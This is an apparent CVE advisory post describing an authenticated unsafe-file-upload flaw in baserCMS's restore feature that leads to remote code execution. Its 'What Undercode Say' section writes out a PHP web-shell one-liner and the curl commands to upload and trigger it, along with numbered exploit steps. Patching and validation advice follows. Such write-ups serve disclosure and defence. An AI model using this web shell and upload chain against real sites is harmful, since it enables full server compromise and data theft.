baserCMS, Unsafe File Upload Leading to Remote Code Execution (RCE) (High severity)

Listen to this Post

The vulnerability resides in the application’s restore functionality, which allows authenticated administrative users to upload a `.zip` archive for site restoration. After the upload, the application automatically extracts the archive to a publicly accessible or include-able directory. A PHP file placed inside the zip is later processed through a call to `require_once` without any validation of the filename, path, or file type. Because `require_once` directly evaluates the PHP code in the context of the application, an attacker can craft a malicious PHP payload inside the zip. Once the zip is uploaded and extracted, the vulnerable code path triggers the inclusion, leading to arbitrary remote code execution (RCE). The attack does not require any additional interaction after the inclusion step, and the executed PHP code inherits the privileges of the web server user. This bypasses typical file-upload restrictions because the file is not directly accessed via HTTP but is instead included by the server-side script. The absence of a filename whitelist or sanitization before the `require_once` call makes the flaw critical. Successful exploitation can result in full site compromise, data theft, and lateral movement within the hosting environment.
Platform: baserCMS
Version: before 4.8.5
Vulnerability: Unsafe File Upload
Severity: High
date: Mar 31 2026

Prediction: Already patched (Mar 31 2026)

What Undercode Say:

Create malicious PHP payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Pack into zip
zip -r malicious.zip shell.php
Upload via curl (adjust URL and cookies)
curl -X POST -F "[email protected]" https://target/admin/tools/restore
Trigger the included payload
curl https://target/path/to/extracted/shell.php?cmd=id

Exploit:

  1. Prepare a ZIP archive containing a PHP backdoor.
  2. Log in as an administrator with restore permissions.

3. Upload the ZIP via the restore function.

  1. The application extracts the archive and includes the PHP file via require_once.
  2. Access the backdoor or wait for automatic inclusion to execute arbitrary code.

Protection from this CVE:

  • Upgrade baserCMS to version 4.8.5 or later.
  • If patching is not immediate, disable the restore feature for untrusted users.
  • Implement strict file validation: verify file extensions and use a whitelist for allowed files before any `include` or `require` operation.
  • Store uploaded archives outside the webroot and use temporary directories with randomized names.

Impact:

Remote Code Execution (RCE) leading to full server compromise, data exposure, and potential privilege escalation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top